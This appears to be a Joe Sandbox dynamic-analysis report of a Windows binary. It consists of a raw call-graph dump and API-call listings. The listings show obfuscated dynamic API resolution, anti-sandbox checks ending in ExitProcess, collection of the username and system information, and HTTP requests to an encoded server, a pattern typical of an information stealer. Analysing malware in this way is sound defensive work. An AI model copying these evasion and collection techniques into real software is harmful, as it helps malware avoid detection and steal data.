7b4c70 27167->27168 27169 7b4c85 27168->27169 27171 7b4c7d lstrcpy 27168->27171 27385 7b4bc0 27169->27385 27171->27169 27172 7b4c90 27173 7b4ccc lstrcpy 27172->27173 27174 7b4cd8 27172->27174 27173->27174 27175 7b4cff lstrcpy 27174->27175 
27176 7b4d0b 27174->27176 27175->27176 27177 7b4d2f lstrcpy 27176->27177 27178 7b4d3b 27176->27178 27177->27178 27179 7b4d6d lstrcpy 27178->27179 27180 7b4d79 27178->27180 27179->27180 27181 7b4dac InternetOpenA StrCmpCA 27180->27181 27182 7b4da0 lstrcpy 27180->27182 27183 7b4de0 27181->27183 27182->27181 27184 7b54b8 InternetCloseHandle CryptStringToBinaryA 27183->27184 27185 7b4def 27183->27185 27186 7b54e8 LocalAlloc 27184->27186 27203 7b55d8 27184->27203 27389 7d3e70 lstrcpy lstrcpy GetSystemTime 27185->27389 27188 7b54ff CryptStringToBinaryA 27186->27188 27186->27203 27189 7b5529 lstrlen 27188->27189 27190 7b5517 LocalFree 27188->27190 27191 7b553d 27189->27191 27190->27203 27193 7b5563 lstrlen 27191->27193 27194 7b5557 lstrcpy 27191->27194 27192 7b4dfa 27195 7b4e23 lstrcpy lstrcat 27192->27195 27196 7b4e38 27192->27196 27198 7b557d 27193->27198 27194->27193 27195->27196 27197 7b4e5a lstrcpy 27196->27197 27200 7b4e62 27196->27200 27197->27200 27199 7b558f lstrcpy lstrcat 27198->27199 27201 7b55a2 27198->27201 27199->27201 27202 7b4e71 lstrlen 27200->27202 27204 7b55d1 27201->27204 27206 7b55c9 lstrcpy 27201->27206 27205 7b4e89 27202->27205 27203->26210 27204->27203 27207 7b4e95 lstrcpy lstrcat 27205->27207 27208 7b4eac 27205->27208 27206->27204 27207->27208 27209 7b4ed5 27208->27209 27210 7b4ecd lstrcpy 27208->27210 27211 7b4edc lstrlen 27209->27211 27210->27209 27212 7b4ef2 27211->27212 27213 7b4efe lstrcpy lstrcat 27212->27213 27214 7b4f15 27212->27214 27213->27214 27215 7b4f36 lstrcpy 27214->27215 27216 7b4f3e 27214->27216 27215->27216 27217 7b4f65 lstrcpy lstrcat 27216->27217 27218 7b4f7b 27216->27218 27217->27218 27219 7b4fa4 27218->27219 27220 7b4f9c lstrcpy 27218->27220 27221 7b4fab lstrlen 27219->27221 27220->27219 27222 7b4fc1 27221->27222 27223 7b4fcd lstrcpy lstrcat 27222->27223 27224 7b4fe4 27222->27224 27223->27224 27225 7b500d 27224->27225 27226 7b5005 lstrcpy 27224->27226 27227 7b5014 lstrlen 27225->27227 27226->27225 27228 7b502a 27227->27228 
27229 7b5036 lstrcpy lstrcat 27228->27229 27230 7b504d 27228->27230 27229->27230 27231 7b5079 27230->27231 27232 7b5071 lstrcpy 27230->27232 27233 7b5080 lstrlen 27231->27233 27232->27231 27234 7b509b 27233->27234 27235 7b50ac lstrcpy lstrcat 27234->27235 27236 7b50bc 27234->27236 27235->27236 27237 7b50da lstrcpy lstrcat 27236->27237 27238 7b50ed 27236->27238 27237->27238 27239 7b510b lstrcpy 27238->27239 27240 7b5113 27238->27240 27239->27240 27241 7b5121 InternetConnectA 27240->27241 27241->27184 27242 7b5150 HttpOpenRequestA 27241->27242 27243 7b518b 27242->27243 27244 7b54b1 InternetCloseHandle 27242->27244 27390 7d7310 lstrlen lstrcpy lstrcat 27243->27390 27244->27184 27246 7b519b 27391 7d7280 lstrcpy 27246->27391 27248 7b51a4 27392 7d72c0 lstrcpy lstrcat 27248->27392 27250 7b51b7 27393 7d7280 lstrcpy 27250->27393 27252 7b51c0 27394 7d7310 lstrlen lstrcpy lstrcat 27252->27394 27254 7b51d5 27395 7d7280 lstrcpy 27254->27395 27256 7b51de 27396 7d7310 lstrlen lstrcpy lstrcat 27256->27396 27258 7b51f4 27397 7d7280 lstrcpy 27258->27397 27260 7b51fd 27398 7d7310 lstrlen lstrcpy lstrcat 27260->27398 27262 7b5213 27399 7d7280 lstrcpy 27262->27399 27264 7b521c 27400 7d7310 lstrlen lstrcpy lstrcat 27264->27400 27266 7b5231 27401 7d7280 lstrcpy 27266->27401 27268 7b523a 27402 7d72c0 lstrcpy lstrcat 27268->27402 27270 7b524d 27403 7d7280 lstrcpy 27270->27403 27272 7b5256 27404 7d7310 lstrlen lstrcpy lstrcat 27272->27404 27274 7b526b 27405 7d7280 lstrcpy 27274->27405 27276 7b5274 27406 7d7310 lstrlen lstrcpy lstrcat 27276->27406 27278 7b5289 27407 7d7280 lstrcpy 27278->27407 27280 7b5292 27408 7d72c0 lstrcpy lstrcat 27280->27408 27282 7b52a5 27409 7d7280 lstrcpy 27282->27409 27284 7b52ae 27410 7d7310 lstrlen lstrcpy lstrcat 27284->27410 27286 7b52c3 27411 7d7280 lstrcpy 27286->27411 27288 7b52cc 27412 7d7310 lstrlen lstrcpy lstrcat 27288->27412 27290 7b52e2 27413 7d7280 lstrcpy 27290->27413 27292 7b52eb 27414 7d7310 lstrlen lstrcpy lstrcat 27292->27414 27294 7b5301 27415 
7d7280 lstrcpy 27294->27415 27296 7b530a 27416 7d7310 lstrlen lstrcpy lstrcat 27296->27416 27298 7b531f 27417 7d7280 lstrcpy 27298->27417 27300 7b5328 27418 7d72c0 lstrcpy lstrcat 27300->27418 27302 7b533b 27419 7d7280 lstrcpy 27302->27419 27304 7b5344 27305 7b537c 27304->27305 27306 7b5370 lstrcpy 27304->27306 27420 7d72c0 lstrcpy lstrcat 27305->27420 27306->27305 27308 7b538a 27421 7d72c0 lstrcpy lstrcat 27308->27421 27310 7b5397 27422 7d7280 lstrcpy 27310->27422 27312 7b53a1 27313 7b53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27312->27313 27314 7b549c InternetCloseHandle 27313->27314 27318 7b53f2 27313->27318 27316 7b54ae 27314->27316 27315 7b53fd lstrlen 27315->27318 27316->27244 27317 7b542e lstrcpy lstrcat 27317->27318 27318->27314 27318->27315 27318->27317 27319 7b546b lstrcpy 27318->27319 27320 7b547a InternetReadFile 27318->27320 27319->27318 27320->27314 27320->27318 27322 7c8cc6 ExitProcess 27321->27322 27324 7c8ccd 27321->27324 27323 7c8ee2 27323->26212 27324->27323 27325 7c8dbd StrCmpCA 27324->27325 27326 7c8ddd StrCmpCA 27324->27326 27327 7c8dfd StrCmpCA 27324->27327 27328 7c8e1d StrCmpCA 27324->27328 27329 7c8e3d StrCmpCA 27324->27329 27330 7c8d5a lstrlen 27324->27330 27331 7c8e56 StrCmpCA 27324->27331 27332 7c8d30 lstrlen 27324->27332 27333 7c8e6f StrCmpCA 27324->27333 27334 7c8e88 lstrlen 27324->27334 27335 7c8d84 StrCmpCA 27324->27335 27336 7c8da4 StrCmpCA 27324->27336 27337 7c8d06 lstrlen 27324->27337 27338 7c8ebb lstrcpy 27324->27338 27325->27324 27326->27324 27327->27324 27328->27324 27329->27324 27330->27324 27331->27324 27332->27324 27333->27324 27334->27324 27335->27324 27336->27324 27337->27324 27338->27324 27339->26218 27340->26220 27341->26226 27342->26228 27343->26234 27344->26236 27345->26242 27346->26246 27347->26252 27348->26254 27349->26258 27350->26272 27351->26276 27352->26275 27353->26271 27354->26275 27355->26293 27356->26278 27357->26279 27358->26283 27359->26289 27360->26290 27361->26297 27362->26300 27363->26306 
27364->26329 27365->26333 27366->26332 27367->26328 27368->26332 27369->26342 27372 7b161f 27371->27372 27373 7b162b lstrcpy 27372->27373 27374 7b1633 27372->27374 27373->27374 27375 7b164d lstrcpy 27374->27375 27376 7b1655 27374->27376 27375->27376 27377 7b166f lstrcpy 27376->27377 27378 7b1677 27376->27378 27377->27378 27379 7b1699 27378->27379 27380 7b1691 lstrcpy 27378->27380 27379->27064 27380->27379 27382 7d71e6 27381->27382 27383 7d71fc lstrcpy 27382->27383 27384 7d2860 27382->27384 27383->27384 27384->26207 27386 7b4bd0 27385->27386 27386->27386 27387 7b4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27386->27387 27388 7b4c41 27387->27388 27388->27172 27389->27192 27390->27246 27391->27248 27392->27250 27393->27252 27394->27254 27395->27256 27396->27258 27397->27260 27398->27262 27399->27264 27400->27266 27401->27268 27402->27270 27403->27272 27404->27274 27405->27276 27406->27278 27407->27280 27408->27282 27409->27284 27410->27286 27411->27288 27412->27290 27413->27292 27414->27294 27415->27296 27416->27298 27417->27300 27418->27302 27419->27304 27420->27308 27421->27310 27422->27312 27453 7d31f0 GetSystemInfo wsprintfA 27428 7b5869 57 API calls 27456 7c1269 408 API calls 27447 7d2d60 11 API calls 27468 7d2b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27469 7da280 __CxxFrameHandler 27448 7c3959 244 API calls 27454 7c01d9 126 API calls 27437 7d2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27429 7d2853 lstrcpy 27430 7ce049 147 API calls 27481 7c8615 48 API calls 27470 7c8615 49 API calls 27438 7d3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27482 7d33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27457 7bf639 144 API calls 27462 7b16b9 200 API calls 27471 7bbf39 177 API calls 27451 7d3130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27483 7cabb2 120 API calls 27475 7c4b29 304 API calls 27484 7c23a9 298 API calls 27459 7b8e20 strlen malloc free std::exception::exception 
27439 7d30a0 GetSystemPowerStatus 27455 7d29a0 GetCurrentProcess IsWow64Process 27485 7bdb99 675 API calls 27441 7d749e 8 API calls ctype 27432 7d8819 6 API calls __getptd 27442 7c2499 290 API calls 27486 7c8615 47 API calls 27452 7d4e35 9 API calls 27476 7b7710 free ctype 27477 7d9711 139 API calls __setmbcp 27434 7d2c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27478 7bb309 98 API calls 27443 7c8c88 16 API calls 27435 7b100d GetCurrentProcess VirtualAllocExNuma ExitProcess VirtualAlloc VirtualFree 27444 7d2880 10 API calls 27445 7d3480 6 API calls 27446 7d4480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27463 7d3280 7 API calls

                              Control-flow Graph

                              APIs
                              • GetProcAddress.KERNEL32(75900000,01450760), ref: 007D63E9
                              • GetProcAddress.KERNEL32(75900000,01450748), ref: 007D6402
                              • GetProcAddress.KERNEL32(75900000,01450790), ref: 007D641A
                              • GetProcAddress.KERNEL32(75900000,01450688), ref: 007D6432
                              • GetProcAddress.KERNEL32(75900000,01458828), ref: 007D644B
                              • GetProcAddress.KERNEL32(75900000,01444F00), ref: 007D6463
                              • GetProcAddress.KERNEL32(75900000,01444E60), ref: 007D647B
                              • GetProcAddress.KERNEL32(75900000,01450568), ref: 007D6494
                              • GetProcAddress.KERNEL32(75900000,01450550), ref: 007D64AC
                              • GetProcAddress.KERNEL32(75900000,014506A0), ref: 007D64C4
                              • GetProcAddress.KERNEL32(75900000,014507C0), ref: 007D64DD
                              • GetProcAddress.KERNEL32(75900000,01444E20), ref: 007D64F5
                              • GetProcAddress.KERNEL32(75900000,01450700), ref: 007D650D
                              • GetProcAddress.KERNEL32(75900000,01450580), ref: 007D6526
                              • GetProcAddress.KERNEL32(75900000,01444DA0), ref: 007D653E
                              • GetProcAddress.KERNEL32(75900000,014506D0), ref: 007D6556
                              • GetProcAddress.KERNEL32(75900000,01450850), ref: 007D656F
                              • GetProcAddress.KERNEL32(75900000,01444EE0), ref: 007D6587
                              • GetProcAddress.KERNEL32(75900000,01450910), ref: 007D659F
                              • GetProcAddress.KERNEL32(75900000,01444E00), ref: 007D65B8
                              • LoadLibraryA.KERNEL32(014508F8,?,?,?,007D1C03), ref: 007D65C9
                              • LoadLibraryA.KERNEL32(01450868,?,?,?,007D1C03), ref: 007D65DB
                              • LoadLibraryA.KERNEL32(01450898,?,?,?,007D1C03), ref: 007D65ED
                              • LoadLibraryA.KERNEL32(014508C8,?,?,?,007D1C03), ref: 007D65FE
                              • LoadLibraryA.KERNEL32(01450880,?,?,?,007D1C03), ref: 007D6610
                              • GetProcAddress.KERNEL32(75070000,014508B0), ref: 007D662D
                              • GetProcAddress.KERNEL32(75FD0000,014508E0), ref: 007D6649
                              • GetProcAddress.KERNEL32(75FD0000,01458C08), ref: 007D6661
                              • GetProcAddress.KERNEL32(75A50000,01458E60), ref: 007D667D
                              • GetProcAddress.KERNEL32(74E50000,01445000), ref: 007D6699
                              • GetProcAddress.KERNEL32(76E80000,01458928), ref: 007D66B5
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 007D66CC
                              Strings
                              • NtQueryInformationProcess, xrefs: 007D66C1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 447bfa9eeaf61ffe6f69da2d4c70933ae97f37c7cca4bf21eec666bba96fc4f3
                              • Instruction ID: aeb686542027dc892e1ffe89112e1990181ad2a7b0983eda59ef29cafe96b789
                              • Opcode Fuzzy Hash: 447bfa9eeaf61ffe6f69da2d4c70933ae97f37c7cca4bf21eec666bba96fc4f3
                              • Instruction Fuzzy Hash: 6FA162F5939280DFD754DFA5EDC8A2637B9F7892463808919E919CB360DB34AD00FB60

                              Control-flow Graph

                              APIs
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01450760), ref: 007D63E9
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01450748), ref: 007D6402
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01450790), ref: 007D641A
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01450688), ref: 007D6432
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01458828), ref: 007D644B
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01444F00), ref: 007D6463
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01444E60), ref: 007D647B
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01450568), ref: 007D6494
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01450550), ref: 007D64AC
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,014506A0), ref: 007D64C4
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,014507C0), ref: 007D64DD
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01444E20), ref: 007D64F5
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01450700), ref: 007D650D
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D1C2F
                              • ExitProcess.KERNEL32 ref: 007D1C67
                              • GetSystemInfo.KERNEL32(?), ref: 007D1C71
                              • ExitProcess.KERNEL32 ref: 007D1C7F
                                • Part of subcall function 007B1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007B1046
                                • Part of subcall function 007B1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 007B104D
                                • Part of subcall function 007B1030: ExitProcess.KERNEL32 ref: 007B1058
                                • Part of subcall function 007B10C0: GlobalMemoryStatusEx.KERNEL32 ref: 007B10EA
                                • Part of subcall function 007B10C0: ExitProcess.KERNEL32 ref: 007B1114
                              • GetUserDefaultLangID.KERNEL32 ref: 007D1C8F
                              • ExitProcess.KERNEL32 ref: 007D1CB2
                              • ExitProcess.KERNEL32 ref: 007D1CE1
                              • lstrlen.KERNEL32(014588F8), ref: 007D1CEE
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D1D15
                              • lstrcat.KERNEL32(00000000,014588F8), ref: 007D1D1D
                              • lstrlen.KERNEL32(007E4B98), ref: 007D1D28
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1D48
                              • lstrcat.KERNEL32(00000000,007E4B98), ref: 007D1D54
                              • lstrlen.KERNEL32(00000000), ref: 007D1D63
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1D89
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007D1D94
                              • lstrlen.KERNEL32(007E4B98), ref: 007D1D9F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1DBC
                              • lstrcat.KERNEL32(00000000,007E4B98), ref: 007D1DC8
                              • lstrlen.KERNEL32(00000000), ref: 007D1DD7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1DF9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007D1E04
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                              • String ID:
                              • API String ID: 3366406952-0
                              • Opcode ID: 54b2856f75ff870efcb636c692428576a9c840568e66b3468578d815a0b61cd5
                              • Instruction ID: fb366e6ef1794ec52d58ae6f6189779474160285c51949c9cb2c87ec06d581b9
                              • Opcode Fuzzy Hash: 54b2856f75ff870efcb636c692428576a9c840568e66b3468578d815a0b61cd5
                              • Instruction Fuzzy Hash: 1571C831625255FBDB21AFB4DC8DB6F377AAF44702F444015F90AAA292DF389C02DB60

                              Control-flow Graph (rendered figure; legend: Executed / Not Executed)
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B6C6F
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B6CC2
                              • InternetOpenA.WININET(007DCFEC,00000001,00000000,00000000,00000000), ref: 007B6CD5
                              • StrCmpCA.SHLWAPI(?,0145E360), ref: 007B6CED
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007B6D15
                              • HttpOpenRequestA.WININET(00000000,GET,?,0145DD98,00000000,00000000,-00400100,00000000), ref: 007B6D50
                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 007B6D77
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B6D86
                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 007B6DA5
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007B6DFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B6E5B
                              • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 007B6E7D
                              • InternetCloseHandle.WININET(00000000), ref: 007B6E8E
                              • InternetCloseHandle.WININET(?), ref: 007B6E98
                              • InternetCloseHandle.WININET(00000000), ref: 007B6EA2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B6EC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                              • String ID: ERROR$GET
                              • API String ID: 3687753495-3591763792
                              • Opcode ID: 2178a041f10a7ddd28ae0ef781922840b2691cb624b29cf67ebf017f6ecb006a
                              • Instruction ID: 5671ff0c60cba53b3778e2391254ef5922d5d0fcdefe2eb3e88f455343710cc3
                              • Opcode Fuzzy Hash: 2178a041f10a7ddd28ae0ef781922840b2691cb624b29cf67ebf017f6ecb006a
                              • Instruction Fuzzy Hash: EE819371A15215ABDB20DFA4DC89FEE77B8AF44700F144468FA05EB281DB78ED058BA0

                              Control-flow Graph (rendered figure; legend: Executed / Not Executed)
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007B4AA3
                              • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 007B4BB0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-3329630956
                              • Opcode ID: 99dd54ace56067f07b1ac644d3226d196cca43e4dc1057ea11c8b9eb558cfc27
                              • Instruction ID: 8a3e0488aaa690fdbe89caf36d95108ad3b6f447c03750af21d76f94f01ad20d
                              • Opcode Fuzzy Hash: 99dd54ace56067f07b1ac644d3226d196cca43e4dc1057ea11c8b9eb558cfc27
                              • Instruction Fuzzy Hash: EB31F898F8A29C768620EBEF4C47F5F6ED5DF8D750B0240567508F7182C9AD6401CAAA
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 007D2A6F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D2A76
                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 007D2A8A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 0bc8f266c2b71220ba06bb6a184cc5e0e27a80caf76ec03a706e2d0195638152
                              • Instruction ID: cd436e410104ec34b5dd59ae52860295788a8a9157ce19d4726aa00e99d3b735
                              • Opcode Fuzzy Hash: 0bc8f266c2b71220ba06bb6a184cc5e0e27a80caf76ec03a706e2d0195638152
                              • Instruction Fuzzy Hash: 0AF054B1A44654BBD710DF98DD49B9EBBBCF749B21F100216F915E3780D774190486E1

                              Control-flow Graph (rendered figure; legend: Executed / Not Executed)
                              APIs
                              • GetProcAddress.KERNEL32(75900000,01444F80), ref: 007D66F5
                              • GetProcAddress.KERNEL32(75900000,01444F20), ref: 007D670D
                              • GetProcAddress.KERNEL32(75900000,01458F68), ref: 007D6726
                              • GetProcAddress.KERNEL32(75900000,01458EF0), ref: 007D673E
                              • GetProcAddress.KERNEL32(75900000,0145CA88), ref: 007D6756
                              • GetProcAddress.KERNEL32(75900000,0145CB90), ref: 007D676F
                              • GetProcAddress.KERNEL32(75900000,0144B058), ref: 007D6787
                              • GetProcAddress.KERNEL32(75900000,0145CB48), ref: 007D679F
                              • GetProcAddress.KERNEL32(75900000,0145CBA8), ref: 007D67B8
                              • GetProcAddress.KERNEL32(75900000,0145C8F0), ref: 007D67D0
                              • GetProcAddress.KERNEL32(75900000,0145CBC0), ref: 007D67E8
                              • GetProcAddress.KERNEL32(75900000,01444F40), ref: 007D6801
                              • GetProcAddress.KERNEL32(75900000,01445020), ref: 007D6819
                              • GetProcAddress.KERNEL32(75900000,01444F60), ref: 007D6831
                              • GetProcAddress.KERNEL32(75900000,01444FA0), ref: 007D684A
                              • GetProcAddress.KERNEL32(75900000,0145C9B0), ref: 007D6862
                              • GetProcAddress.KERNEL32(75900000,0145C9E0), ref: 007D687A
                              • GetProcAddress.KERNEL32(75900000,0144AF68), ref: 007D6893
                              • GetProcAddress.KERNEL32(75900000,01445040), ref: 007D68AB
                              • GetProcAddress.KERNEL32(75900000,0145CAE8), ref: 007D68C3
                              • GetProcAddress.KERNEL32(75900000,0145C8D8), ref: 007D68DC
                              • GetProcAddress.KERNEL32(75900000,0145C998), ref: 007D68F4
                              • GetProcAddress.KERNEL32(75900000,0145C9F8), ref: 007D690C
                              • GetProcAddress.KERNEL32(75900000,01445080), ref: 007D6925
                              • GetProcAddress.KERNEL32(75900000,0145C938), ref: 007D693D
                              • GetProcAddress.KERNEL32(75900000,0145CA10), ref: 007D6955
                              • GetProcAddress.KERNEL32(75900000,0145CB78), ref: 007D696E
                              • GetProcAddress.KERNEL32(75900000,0145C968), ref: 007D6986
                              • GetProcAddress.KERNEL32(75900000,0145CAA0), ref: 007D699E
                              • GetProcAddress.KERNEL32(75900000,0145C908), ref: 007D69B7
                              • GetProcAddress.KERNEL32(75900000,0145CA40), ref: 007D69CF
                              • GetProcAddress.KERNEL32(75900000,0145CB60), ref: 007D69E7
                              • GetProcAddress.KERNEL32(75900000,0145C920), ref: 007D6A00
                              • GetProcAddress.KERNEL32(75900000,0145A070), ref: 007D6A18
                              • GetProcAddress.KERNEL32(75900000,0145C950), ref: 007D6A30
                              • GetProcAddress.KERNEL32(75900000,0145C980), ref: 007D6A49
                              • GetProcAddress.KERNEL32(75900000,014450A0), ref: 007D6A61
                              • GetProcAddress.KERNEL32(75900000,0145CA58), ref: 007D6A79
                              • GetProcAddress.KERNEL32(75900000,014450E0), ref: 007D6A92
                              • GetProcAddress.KERNEL32(75900000,0145C9C8), ref: 007D6AAA
                              • GetProcAddress.KERNEL32(75900000,0145CA28), ref: 007D6AC2
                              • GetProcAddress.KERNEL32(75900000,01445100), ref: 007D6ADB
                              • GetProcAddress.KERNEL32(75900000,01445120), ref: 007D6AF3
                              • LoadLibraryA.KERNEL32(0145CB30,007D051F), ref: 007D6B05
                              • LoadLibraryA.KERNEL32(0145CA70), ref: 007D6B16
                              • LoadLibraryA.KERNEL32(0145CAB8), ref: 007D6B28
                              • LoadLibraryA.KERNEL32(0145CAD0), ref: 007D6B3A
                              • LoadLibraryA.KERNEL32(0145CB00), ref: 007D6B4B
                              • LoadLibraryA.KERNEL32(0145CB18), ref: 007D6B5D
                              • LoadLibraryA.KERNEL32(0145CEC0), ref: 007D6B6F
                              • LoadLibraryA.KERNEL32(0145CE48), ref: 007D6B80
                              • GetProcAddress.KERNEL32(75FD0000,01445240), ref: 007D6B9C
                              • GetProcAddress.KERNEL32(75FD0000,0145CE60), ref: 007D6BB4
                              • GetProcAddress.KERNEL32(75FD0000,01458908), ref: 007D6BCD
                              • GetProcAddress.KERNEL32(75FD0000,0145CE90), ref: 007D6BE5
                              • GetProcAddress.KERNEL32(75FD0000,01445220), ref: 007D6BFD
                              • GetProcAddress.KERNEL32(734B0000,0144B120), ref: 007D6C1D
